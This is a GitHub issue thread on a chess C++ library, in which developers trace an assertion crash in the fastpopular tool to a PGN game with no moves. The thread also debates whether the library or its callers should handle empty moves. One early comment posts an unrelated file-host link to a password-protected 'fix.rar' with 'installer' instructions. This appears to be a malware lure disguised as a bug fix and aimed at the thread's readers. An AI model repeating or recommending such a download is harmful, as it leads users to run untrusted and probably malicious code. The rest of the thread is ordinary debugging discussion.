### ISSUE TITLE
assertion error for fishtest pgns

### ISSUE THREAD

**Issue by robertnurnberg** [Disservin/chess-library#113]
I get the exception 
```
fastpopular: external/chess.hpp:2055: void chess::Board::makeMove(chess::Move) [with bool EXACT = true]: Assertion `at(move.from()) != Piece::NONE' failed.
Abort (core dumped)
```
for this version of the library for virtually any fishtest pgn I try to analyse with fastpopular.

Example command line to trigger this: 
```
./fastpopular --file ./pgns/24-08-24/66ca338bbf8c9d8780fda84e/66ca338bbf8c9d8780fda84e.pgn.gz
```

For the main branch of fastpopular (that uses a slightly older version of this lib) the error is 
```
fastpopular: external/chess.hpp:2029: void chess::Board::makeMove(chess::Move) [with bool EXACT = true]: Assertion `at(move.from()) != Piece::NONE' failed.
Abort (core dumped)
```
This will also be of interest to @vondele.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by robertnurnberg** [comment]
Hm, using the lib for the wdl model works, so this could be something specific to fastpopular.

**Comment by robertnurnberg** [comment]
Ok, so the last fastpopular commit that works flawlessly is this one: https://github.com/vondele/fastpopular/commit/011f2019fa12537cd53f6a116f8650ce4e8982cc

Since then something in the chesslib must have changed which makes fastpopular no longer behave as expected.

**Comment by Disservin** [comment]
& can you revert this again ? https://github.com/vondele/fastpopular/commit/2a7fb17341fc372f0f4dbe18dc378d446b72fcfe
to this?

**Comment by robertnurnberg** [comment]
> & can you revert this again ? [vondele/fastpopular@2a7fb17](https://github.com/vondele/fastpopular/commit/2a7fb17341fc372f0f4dbe18dc378d446b72fcfe) to this?

reverting that has no effect. note also that the changed lib version that first caused the problem is 0.6.55
(before the recent ep square changes iiuc)

**Comment by robertnurnberg** [comment]
> mh can you debug which position this is? and move?

```
board:  r . b q k . . r 
 p p . p . p b p 
 . . n . . n p . 
 . . . . p . . . 
 . . . . P . . . 
 . . N P . . P . 
 P P . . N P B P 
 R . B Q . R K . 


Side to move: 0
Castling rights: kq
Halfmoves: 0
Fullmoves: 9
EP: 64
Hash: 7257696068650699373


move: a1a1
fastpopular: external/chess.hpp:2029: void chess::Board::makeMove(chess::Move) [with bool EXACT = false]: Assertion `at(move.from()) != Piece::NONE' failed.
```

**Comment by Disservin** [comment]
mh so where is a1a1 coming from ?

**Comment by robertnurnberg** [comment]
This is for 
```diff
-    board.makeMove<true>(m);
+    std::cout << "board: " << board << "\nmove: " << m << std::endl;
+
+    board.makeMove(m);
```
and then `./fastpopular --file ./pgns/24-08-24/66ca338bbf8c9d8780fda84e/66ca338bbf8c9d8780fda84e.pgn.gz --concurrency 1`.

**Comment by robertnurnberg** [comment]
> mh so where is a1a1 coming from ?

```c++
  void move(std::string_view move, std::string_view comment) override {

    if (retained_plies >= max_plies) {
      this->skipPgn(true);
      return;
    }

    Move m;

    m = uci::parseSan(board, move, moves);

    std::cout << "board: " << board << "\nmove: " << m << std::endl;

    board.makeMove(m);
```

**Comment by Disservin** [comment]
check the board fen and the move, might be that the move is illegal?

**Comment by robertnurnberg** [comment]
```
board: 
 r . b q k . . r 
 p p . p . p b p 
 . . n . . n p . 
 . . . . p . . . 
 . . . . P . . . 
 . . N P . . P . 
 P P . . N P B P 
 R . B Q . R K . 


Side to move: 0
Castling rights: kq
Halfmoves: 0
Fullmoves: 9
EP: 64
Hash: 7257696068650699373


move: 
m: a1a1
fastpopular: external/chess.hpp:2029: void chess::Board::makeMove(chess::Move) [with bool EXACT = false]: Assertion `at(move.from()) != Piece::NONE' failed.
```
so the `move` string is empty (or spaces) for some reason (bbl)

**Comment by Disservin** [comment]
can you just unzip the pgn and upload here and we can take a look?

**Comment by robertnurnberg** [comment]
To the problem seem to be games without moves:

```
[Event "Batch 285: resc3 vs master"]
[Site "https://tests.stockfishchess.org/tests/view/66ca338bbf8c9d8780fda84e"]
[Date "2024.08.26"]
[Round "1"]
[White "New-4b280597d2d985af7b8c5597c438ed375d753420"]
[Black "Base-9fb58328e363d84e3cf720b018e639b139ba95c2"]
[Result "*"]
[FEN "r1bqk2r/pp1p1pbp/2n2np1/4p3/4P3/2NP2P1/PP2NPBP/R1BQ1RK1 w kq - 0 9"]
[GameDuration "00:00:08"]
[GameEndTime "2024-08-26T03:53:45.284 EEST"]
[GameStartTime "2024-08-26T03:53:36.365 EEST"]
[PlyCount "0"]
[SetUp "1"]
[Termination "unterminated"]
[TimeControl "70.55+0.706"]

{No result} *
```

```
> ./fastpopular --file fail.pgn --concurrency 1
Found 1 .pgn(.gz) files, creating 1 chunks for processing.
FEN: r1bqk2r/pp1p1pbp/2n2np1/4p3/4P3/2NP2P1/PP2NPBP/R1BQ1RK1 w kq - 0 9"e"
board: 
 r . b q k . . r 
 p p . p . p b p 
 . . n . . n p . 
 . . . . p . . . 
 . . . . P . . . 
 . . N P . . P . 
 P P . . N P B P 
 R . B Q . R K . 


Side to move: 0
Castling rights: kq
Halfmoves: 0
Fullmoves: 9
EP: 64
Hash: 7257696068650699373


move: 
m: a1a1
fastpopular: external/chess.hpp:2029: void chess::Board::makeMove(chess::Move) [with bool EXACT = false]: Assertion `at(move.from()) != Piece::NONE' failed.
Abort (core dumped)
```

(btw, I do not know why the `FEN` key value ends with `0 9"e"`)

**Comment by Disservin** [comment]
mh ive got a similar test case here

https://github.com/Disservin/chess-library/blob/master/tests/pgns/no_moves_but_comment_followed_by_termination_marker.pgn

gotta check later whats wrong

**Comment by robertnurnberg** [comment]
Main difference seems to be that the triggering pgn doesn't have a game result. Good luck!

**Comment by Disservin** [comment]
well still it is a bug in fastpopular, it should check if the move is none

**Comment by Disservin** [comment]
oh lol

**Comment by Disservin** [comment]
this should be fixed here https://github.com/vondele/fastpopular/blob/main/fastpopular.cpp#L158, skip if the san is a `Move::NO_MOVE`

**Comment by Disservin** [comment]
also needs to fixed in wdl https://github.com/official-stockfish/WDL_model/blob/master/scoreWDLstat.cpp#L213

**Comment by robertnurnberg** [comment]
hm, I think it would be more natural to fix this at the source, that is within the chess lib.
```
    /// @brief Called for each move of a game
    /// @param move
    /// @param comment
    virtual void move(std::string_view move, std::string_view comment) = 0;
```
This seems to indicate to the user that `move()` will only be called for each move of the game. and the issue arises because the lib calls `move()` with an empty string for `move`.

I also believe other libs, like python-chess, only provide a list of actual moves to the end user.

**Comment by Disservin** [comment]
Well the way I have designed it is that this function gets called for the move and it's comment. In your example there's no move and the comment is "No result".

**Comment by robertnurnberg** [comment]
Hm, I see. That is one point of view. The other is that moves should be preceded by a number and at least one full stop. ;)

**Comment by robertnurnberg** [comment]
I once wrote this simple pgn checker, using python-chess:
```python
import argparse, chess, chess.pgn

parser = argparse.ArgumentParser(
    description="A script to check a pgn file for correctness.",
    formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("filename", help="pgn file")
parser.add_argument(
    "-v",
    "--verbose",
    action="count",
    default=0,
    help="increase output with -v, -vv, -vvv etc.",
)
args = parser.parse_args()
pgn = open(args.filename)
gn = 0
while True:
    game = chess.pgn.read_game(pgn)
    if game is None:
        break
    gn += 1
    if args.verbose:
        print(game)
    plies = 0
    board = game.board()
    pv = board.epd() + "; PV: "
    for move in game.mainline_moves():
        board.push(move)
        plies += 1
        pv += move.uci() + " "
    print(f"Game {gn} read with {plies} plies.")
    if args.verbose:
        print("  FEN: ", pv)
    for e in game.errors:
        print(f"  Original source of game {gn} has error {e}.")

print(f"Read a total of {gn} games from file {args.filename}.")
```

Output:
```
> python pgnchecker.py -v fail.pgn
[Event "Batch 285: resc3 vs master"]
[Site "https://tests.stockfishchess.org/tests/view/66ca338bbf8c9d8780fda84e"]
[Date "2024.08.26"]
[Round "1"]
[White "New-4b280597d2d985af7b8c5597c438ed375d753420"]
[Black "Base-9fb58328e363d84e3cf720b018e639b139ba95c2"]
[Result "*"]
[FEN "r1bqk2r/pp1p1pbp/2n2np1/4p3/4P3/2NP2P1/PP2NPBP/R1BQ1RK1 w kq - 0 9"]
[GameDuration "00:00:08"]
[GameEndTime "2024-08-26T03:53:45.284 EEST"]
[GameStartTime "2024-08-26T03:53:36.365 EEST"]
[PlyCount "0"]
[SetUp "1"]
[Termination "unterminated"]
[TimeControl "70.55+0.706"]

{ No result } *
Game 1 read with 0 plies.
  FEN:  r1bqk2r/pp1p1pbp/2n2np1/4p3/4P3/2NP2P1/PP2NPBP/R1BQ1RK1 w kq -; PV: 
Read a total of 1 games from file fail.pgn.
```

**Comment by vondele** [comment]
catching up with this right now. I think the fix can be either way, but requiring the user to handle none moves will surprise them. 

The main value seems to be getting this termination comment?

Somehow handling it the same a python-chess would make transitioning from one to the other easier.

**Comment by robertnurnberg** [comment]
@Disservin you could offer two versions to the user: the default one behaving like python-chess, and a templated one (or default-paramter changed one) that allows empty-moves with non-empty comments.

**Comment by robertnurnberg** [comment]
Yes, that is your point of view. The other is that the chess lib should only return actual moves from the pgn as part of this specific API. I think both have some merit, with the latter probably being too the one most users would expect.
